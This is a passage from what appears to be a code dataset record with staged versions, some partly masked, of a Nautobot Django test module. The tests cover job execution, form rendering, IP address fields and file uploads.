\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_no_field_order'\n name = 'TestNoFieldOrder'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var23\">Var23:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var23\" name=\"var23\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">I want to be second</span></td></tr>\n<tr><th><label for=\"id_var2\">Var2:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var2\" name=\"var2\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span></td></tr>\n<tr><th><label for=\"id__commit\">Commit changes:</label></th><td>\n<input checked id=\"id__commit\" name=\"_commit\" placeholder=\"Commit changes\" type=\"checkbox\">\n<br><span class=\"helptext\">Commit changes to the database (uncheck for a dry-run)</span></td></tr>\"\"\"\n )\n\n def test_ready_only_job_pass(self):\n \"\"\"\n Job read only test with pass result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_pass'\n name = 'TestReadOnlyPass'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_COMPLETED)\n self.assertEqual(Site.objects.count(), 0)\n\n def test_read_only_job_fail(self):\n \"\"\"\n Job read only test with fail result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_fail'\n name = 'TestReadOnlyFail'\n job_class = 
get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_ERRORED)\n self.assertEqual(Site.objects.count(), 0)\n self.assertNotEqual(job_result.data['run']['log'][-1][-1],\n 'Database changes have been reverted due to error.')\n\n def test_read_only_no_commit_field(self):\n \"\"\"\n Job read only test commit field is not shown.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_no_commit_field'\n name = 'TestReadOnlyNoCommitField'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var\">Var:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var\" name=\"var\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span><input id=\"id__commit\" name=\"_commit\" type=\"hidden\" value=\"False\"></td></tr>\"\"\"\n )\n\n def test_ip_address_vars(self):\n \"\"\"\n Test that IPAddress variable fields behave as expected.\n\n This test case exercises the following types for both IPv4 and IPv6:\n\n - IPAddressVar\n - IPAddressWithMaskVar\n - IPNetworkVar\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_ipaddress_vars'\n name = 'TestIPAddresses'\n job_class = get_job(f'local/{module}/{name}')\n form_data = dict(ipv4_address='1.2.3.4', ipv4_with_mask=\n '1.2.3.4/32', ipv4_network='1.2.3.0/24', ipv6_address=\n '2001:db8::1', ipv6_with_mask='2001:db8::1/64',\n ipv6_network='2001:db8::/64')\n form = job_class().as_form(form_data)\n self.assertTrue(form.is_valid())\n job_result = 
JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = job_class.serialize_data(form.cleaned_data)\n run_job(data=data, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n job_payload = job_result.data['run']['log'][0][2]\n job_result_data = json.loads(job_payload)\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_COMPLETED)\n self.assertEqual(form_data, job_result_data)\n\n\nclass JobFileUploadTest(TestCase):\n \"\"\"Test a job that uploads/deletes files.\"\"\"\n\n @classmethod\n def setUpTestData(cls):\n cls.file_contents = b'I am content.\\n'\n cls.dummy_file = SimpleUploadedFile(name='dummy.txt', content=cls.\n file_contents)\n cls.job_content_type = ContentType.objects.get(app_label='extras',\n model='job')\n\n def setUp(self):\n self.dummy_file.seek(0)\n\n def test_run_job_pass(self):\n \"\"\"Test that file upload succeeds; job SUCCEEDS; and files are deleted.\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n job_name = 'local/test_file_upload_pass/TestFileUploadPass'\n job_class = get_job(job_name)\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = {'file': self.dummy_file}\n form = job_class().as_form(files=data)\n self.assertTrue(form.is_valid())\n serialized_data = job_class.serialize_data(form.cleaned_data)\n self.assertTrue(isinstance(serialized_data['file'], uuid.UUID))\n self.assertEqual(serialized_data['file'], FileProxy.objects.\n latest().pk)\n self.assertEqual(FileProxy.objects.count(), 1)\n run_job(data=serialized_data, request=None, commit=False,\n job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.data['run']['log'][0][2],\n f'File contents: {self.file_contents}')\n self.assertEqual(FileProxy.objects.count(), 0)\n\n def 
test_run_job_fail(self):\n \"\"\"Test that file upload succeeds; job FAILS; files deleted.\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n job_name = 'local/test_file_upload_fail/TestFileUploadFail'\n job_class = get_job(job_name)\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = {'file': self.dummy_file}\n form = job_class().as_form(files=data)\n self.assertTrue(form.is_valid())\n serialized_data = job_class.serialize_data(form.cleaned_data)\n self.assertTrue(isinstance(serialized_data['file'], uuid.UUID))\n self.assertEqual(serialized_data['file'], FileProxy.objects.\n latest().pk)\n self.assertEqual(FileProxy.objects.count(), 1)\n run_job(data=serialized_data, request=None, commit=False,\n job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.data['run']['log'][0][2],\n f'File contents: {self.file_contents}')\n self.assertEqual(job_result.data['run']['log'][-1][-1],\n 'Database changes have been reverted due to error.')\n self.assertEqual(FileProxy.objects.count(), 0)\n",
"step-3": "<mask token>\n\n\nclass JobTest(TestCase):\n <mask token>\n <mask token>\n\n @classmethod\n def setUpTestData(cls):\n cls.job_content_type = ContentType.objects.get(app_label='extras',\n model='job')\n\n def test_job_pass(self):\n \"\"\"\n Job test with pass result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_pass'\n name = 'TestPass'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_COMPLETED)\n\n def test_job_fail(self):\n \"\"\"\n Job test with fail result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_fail'\n name = 'TestFail'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_ERRORED)\n\n def test_field_order(self):\n \"\"\"\n Job test with field order.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_field_order'\n name = 'TestFieldOrder'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var2\">Var2:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var2\" name=\"var2\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span></td></tr>\n<tr><th><label 
for=\"id_var23\">Var23:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var23\" name=\"var23\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">I want to be second</span></td></tr>\n<tr><th><label for=\"id__commit\">Commit changes:</label></th><td>\n<input checked id=\"id__commit\" name=\"_commit\" placeholder=\"Commit changes\" type=\"checkbox\">\n<br><span class=\"helptext\">Commit changes to the database (uncheck for a dry-run)</span></td></tr>\"\"\"\n )\n\n def test_no_field_order(self):\n \"\"\"\n Job test without field_order.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_no_field_order'\n name = 'TestNoFieldOrder'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var23\">Var23:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var23\" name=\"var23\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">I want to be second</span></td></tr>\n<tr><th><label for=\"id_var2\">Var2:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var2\" name=\"var2\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span></td></tr>\n<tr><th><label for=\"id__commit\">Commit changes:</label></th><td>\n<input checked id=\"id__commit\" name=\"_commit\" placeholder=\"Commit changes\" type=\"checkbox\">\n<br><span class=\"helptext\">Commit changes to the database (uncheck for a dry-run)</span></td></tr>\"\"\"\n )\n\n def test_ready_only_job_pass(self):\n \"\"\"\n Job read only test with pass result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_pass'\n name = 'TestReadOnlyPass'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n 
obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_COMPLETED)\n self.assertEqual(Site.objects.count(), 0)\n\n def test_read_only_job_fail(self):\n \"\"\"\n Job read only test with fail result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_fail'\n name = 'TestReadOnlyFail'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_ERRORED)\n self.assertEqual(Site.objects.count(), 0)\n self.assertNotEqual(job_result.data['run']['log'][-1][-1],\n 'Database changes have been reverted due to error.')\n\n def test_read_only_no_commit_field(self):\n \"\"\"\n Job read only test commit field is not shown.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_no_commit_field'\n name = 'TestReadOnlyNoCommitField'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var\">Var:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var\" name=\"var\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span><input id=\"id__commit\" name=\"_commit\" type=\"hidden\" value=\"False\"></td></tr>\"\"\"\n )\n\n def test_ip_address_vars(self):\n \"\"\"\n Test that IPAddress variable fields behave as expected.\n\n This test case exercises the following types for both IPv4 and IPv6:\n\n - IPAddressVar\n - 
IPAddressWithMaskVar\n - IPNetworkVar\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_ipaddress_vars'\n name = 'TestIPAddresses'\n job_class = get_job(f'local/{module}/{name}')\n form_data = dict(ipv4_address='1.2.3.4', ipv4_with_mask=\n '1.2.3.4/32', ipv4_network='1.2.3.0/24', ipv6_address=\n '2001:db8::1', ipv6_with_mask='2001:db8::1/64',\n ipv6_network='2001:db8::/64')\n form = job_class().as_form(form_data)\n self.assertTrue(form.is_valid())\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = job_class.serialize_data(form.cleaned_data)\n run_job(data=data, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n job_payload = job_result.data['run']['log'][0][2]\n job_result_data = json.loads(job_payload)\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_COMPLETED)\n self.assertEqual(form_data, job_result_data)\n\n\nclass JobFileUploadTest(TestCase):\n \"\"\"Test a job that uploads/deletes files.\"\"\"\n\n @classmethod\n def setUpTestData(cls):\n cls.file_contents = b'I am content.\\n'\n cls.dummy_file = SimpleUploadedFile(name='dummy.txt', content=cls.\n file_contents)\n cls.job_content_type = ContentType.objects.get(app_label='extras',\n model='job')\n\n def setUp(self):\n self.dummy_file.seek(0)\n\n def test_run_job_pass(self):\n \"\"\"Test that file upload succeeds; job SUCCEEDS; and files are deleted.\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n job_name = 'local/test_file_upload_pass/TestFileUploadPass'\n job_class = get_job(job_name)\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = {'file': self.dummy_file}\n form = job_class().as_form(files=data)\n self.assertTrue(form.is_valid())\n 
serialized_data = job_class.serialize_data(form.cleaned_data)\n self.assertTrue(isinstance(serialized_data['file'], uuid.UUID))\n self.assertEqual(serialized_data['file'], FileProxy.objects.\n latest().pk)\n self.assertEqual(FileProxy.objects.count(), 1)\n run_job(data=serialized_data, request=None, commit=False,\n job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.data['run']['log'][0][2],\n f'File contents: {self.file_contents}')\n self.assertEqual(FileProxy.objects.count(), 0)\n\n def test_run_job_fail(self):\n \"\"\"Test that file upload succeeds; job FAILS; files deleted.\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n job_name = 'local/test_file_upload_fail/TestFileUploadFail'\n job_class = get_job(job_name)\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = {'file': self.dummy_file}\n form = job_class().as_form(files=data)\n self.assertTrue(form.is_valid())\n serialized_data = job_class.serialize_data(form.cleaned_data)\n self.assertTrue(isinstance(serialized_data['file'], uuid.UUID))\n self.assertEqual(serialized_data['file'], FileProxy.objects.\n latest().pk)\n self.assertEqual(FileProxy.objects.count(), 1)\n run_job(data=serialized_data, request=None, commit=False,\n job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.data['run']['log'][0][2],\n f'File contents: {self.file_contents}')\n self.assertEqual(job_result.data['run']['log'][-1][-1],\n 'Database changes have been reverted due to error.')\n self.assertEqual(FileProxy.objects.count(), 0)\n",
"step-4": "<mask token>\n\n\nclass JobTest(TestCase):\n <mask token>\n maxDiff = None\n\n @classmethod\n def setUpTestData(cls):\n cls.job_content_type = ContentType.objects.get(app_label='extras',\n model='job')\n\n def test_job_pass(self):\n \"\"\"\n Job test with pass result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_pass'\n name = 'TestPass'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_COMPLETED)\n\n def test_job_fail(self):\n \"\"\"\n Job test with fail result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_fail'\n name = 'TestFail'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_ERRORED)\n\n def test_field_order(self):\n \"\"\"\n Job test with field order.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_field_order'\n name = 'TestFieldOrder'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var2\">Var2:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var2\" name=\"var2\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span></td></tr>\n<tr><th><label 
for=\"id_var23\">Var23:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var23\" name=\"var23\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">I want to be second</span></td></tr>\n<tr><th><label for=\"id__commit\">Commit changes:</label></th><td>\n<input checked id=\"id__commit\" name=\"_commit\" placeholder=\"Commit changes\" type=\"checkbox\">\n<br><span class=\"helptext\">Commit changes to the database (uncheck for a dry-run)</span></td></tr>\"\"\"\n )\n\n def test_no_field_order(self):\n \"\"\"\n Job test without field_order.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_no_field_order'\n name = 'TestNoFieldOrder'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var23\">Var23:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var23\" name=\"var23\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">I want to be second</span></td></tr>\n<tr><th><label for=\"id_var2\">Var2:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var2\" name=\"var2\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span></td></tr>\n<tr><th><label for=\"id__commit\">Commit changes:</label></th><td>\n<input checked id=\"id__commit\" name=\"_commit\" placeholder=\"Commit changes\" type=\"checkbox\">\n<br><span class=\"helptext\">Commit changes to the database (uncheck for a dry-run)</span></td></tr>\"\"\"\n )\n\n def test_ready_only_job_pass(self):\n \"\"\"\n Job read only test with pass result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_pass'\n name = 'TestReadOnlyPass'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n 
obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_COMPLETED)\n self.assertEqual(Site.objects.count(), 0)\n\n def test_read_only_job_fail(self):\n \"\"\"\n Job read only test with fail result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_fail'\n name = 'TestReadOnlyFail'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_ERRORED)\n self.assertEqual(Site.objects.count(), 0)\n self.assertNotEqual(job_result.data['run']['log'][-1][-1],\n 'Database changes have been reverted due to error.')\n\n def test_read_only_no_commit_field(self):\n \"\"\"\n Job read only test commit field is not shown.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_no_commit_field'\n name = 'TestReadOnlyNoCommitField'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var\">Var:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var\" name=\"var\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span><input id=\"id__commit\" name=\"_commit\" type=\"hidden\" value=\"False\"></td></tr>\"\"\"\n )\n\n def test_ip_address_vars(self):\n \"\"\"\n Test that IPAddress variable fields behave as expected.\n\n This test case exercises the following types for both IPv4 and IPv6:\n\n - IPAddressVar\n - 
IPAddressWithMaskVar\n - IPNetworkVar\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_ipaddress_vars'\n name = 'TestIPAddresses'\n job_class = get_job(f'local/{module}/{name}')\n form_data = dict(ipv4_address='1.2.3.4', ipv4_with_mask=\n '1.2.3.4/32', ipv4_network='1.2.3.0/24', ipv6_address=\n '2001:db8::1', ipv6_with_mask='2001:db8::1/64',\n ipv6_network='2001:db8::/64')\n form = job_class().as_form(form_data)\n self.assertTrue(form.is_valid())\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = job_class.serialize_data(form.cleaned_data)\n run_job(data=data, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n job_payload = job_result.data['run']['log'][0][2]\n job_result_data = json.loads(job_payload)\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_COMPLETED)\n self.assertEqual(form_data, job_result_data)\n\n\nclass JobFileUploadTest(TestCase):\n \"\"\"Test a job that uploads/deletes files.\"\"\"\n\n @classmethod\n def setUpTestData(cls):\n cls.file_contents = b'I am content.\\n'\n cls.dummy_file = SimpleUploadedFile(name='dummy.txt', content=cls.\n file_contents)\n cls.job_content_type = ContentType.objects.get(app_label='extras',\n model='job')\n\n def setUp(self):\n self.dummy_file.seek(0)\n\n def test_run_job_pass(self):\n \"\"\"Test that file upload succeeds; job SUCCEEDS; and files are deleted.\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n job_name = 'local/test_file_upload_pass/TestFileUploadPass'\n job_class = get_job(job_name)\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = {'file': self.dummy_file}\n form = job_class().as_form(files=data)\n self.assertTrue(form.is_valid())\n 
serialized_data = job_class.serialize_data(form.cleaned_data)\n self.assertTrue(isinstance(serialized_data['file'], uuid.UUID))\n self.assertEqual(serialized_data['file'], FileProxy.objects.\n latest().pk)\n self.assertEqual(FileProxy.objects.count(), 1)\n run_job(data=serialized_data, request=None, commit=False,\n job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.data['run']['log'][0][2],\n f'File contents: {self.file_contents}')\n self.assertEqual(FileProxy.objects.count(), 0)\n\n def test_run_job_fail(self):\n \"\"\"Test that file upload succeeds; job FAILS; files deleted.\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n job_name = 'local/test_file_upload_fail/TestFileUploadFail'\n job_class = get_job(job_name)\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = {'file': self.dummy_file}\n form = job_class().as_form(files=data)\n self.assertTrue(form.is_valid())\n serialized_data = job_class.serialize_data(form.cleaned_data)\n self.assertTrue(isinstance(serialized_data['file'], uuid.UUID))\n self.assertEqual(serialized_data['file'], FileProxy.objects.\n latest().pk)\n self.assertEqual(FileProxy.objects.count(), 1)\n run_job(data=serialized_data, request=None, commit=False,\n job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.data['run']['log'][0][2],\n f'File contents: {self.file_contents}')\n self.assertEqual(job_result.data['run']['log'][-1][-1],\n 'Database changes have been reverted due to error.')\n self.assertEqual(FileProxy.objects.count(), 0)\n",
"step-5": "import json\nimport os\nimport uuid\n\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.conf import settings\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom nautobot.dcim.models import Site\nfrom nautobot.extras.choices import JobResultStatusChoices\nfrom nautobot.extras.jobs import get_job, run_job\nfrom nautobot.extras.models import FileAttachment, FileProxy, JobResult\nfrom nautobot.utilities.testing import TestCase\n\n\nclass JobTest(TestCase):\n \"\"\"\n Test basic jobs to ensure importing works.\n \"\"\"\n\n maxDiff = None\n\n @classmethod\n def setUpTestData(cls):\n cls.job_content_type = ContentType.objects.get(app_label=\"extras\", model=\"job\")\n\n def test_job_pass(self):\n \"\"\"\n Job test with pass result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, \"extras/tests/dummy_jobs\")):\n\n module = \"test_pass\"\n name = \"TestPass\"\n job_class = get_job(f\"local/{module}/{name}\")\n\n job_result = JobResult.objects.create(\n name=job_class.class_path,\n obj_type=self.job_content_type,\n user=None,\n job_id=uuid.uuid4(),\n )\n\n run_job(data={}, request=None, commit=False, job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_COMPLETED)\n\n def test_job_fail(self):\n \"\"\"\n Job test with fail result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, \"extras/tests/dummy_jobs\")):\n\n module = \"test_fail\"\n name = \"TestFail\"\n job_class = get_job(f\"local/{module}/{name}\")\n job_result = JobResult.objects.create(\n name=job_class.class_path,\n obj_type=self.job_content_type,\n user=None,\n job_id=uuid.uuid4(),\n )\n run_job(data={}, request=None, commit=False, job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_ERRORED)\n\n def test_field_order(self):\n \"\"\"\n Job test with field order.\n 
\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, \"extras/tests/dummy_jobs\")):\n\n module = \"test_field_order\"\n name = \"TestFieldOrder\"\n job_class = get_job(f\"local/{module}/{name}\")\n\n form = job_class().as_form()\n\n self.assertHTMLEqual(\n form.as_table(),\n \"\"\"<tr><th><label for=\"id_var2\">Var2:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var2\" name=\"var2\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span></td></tr>\n<tr><th><label for=\"id_var23\">Var23:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var23\" name=\"var23\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">I want to be second</span></td></tr>\n<tr><th><label for=\"id__commit\">Commit changes:</label></th><td>\n<input checked id=\"id__commit\" name=\"_commit\" placeholder=\"Commit changes\" type=\"checkbox\">\n<br><span class=\"helptext\">Commit changes to the database (uncheck for a dry-run)</span></td></tr>\"\"\",\n )\n\n def test_no_field_order(self):\n \"\"\"\n Job test without field_order.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, \"extras/tests/dummy_jobs\")):\n\n module = \"test_no_field_order\"\n name = \"TestNoFieldOrder\"\n job_class = get_job(f\"local/{module}/{name}\")\n\n form = job_class().as_form()\n\n self.assertHTMLEqual(\n form.as_table(),\n \"\"\"<tr><th><label for=\"id_var23\">Var23:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var23\" name=\"var23\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">I want to be second</span></td></tr>\n<tr><th><label for=\"id_var2\">Var2:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var2\" name=\"var2\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span></td></tr>\n<tr><th><label for=\"id__commit\">Commit changes:</label></th><td>\n<input checked 
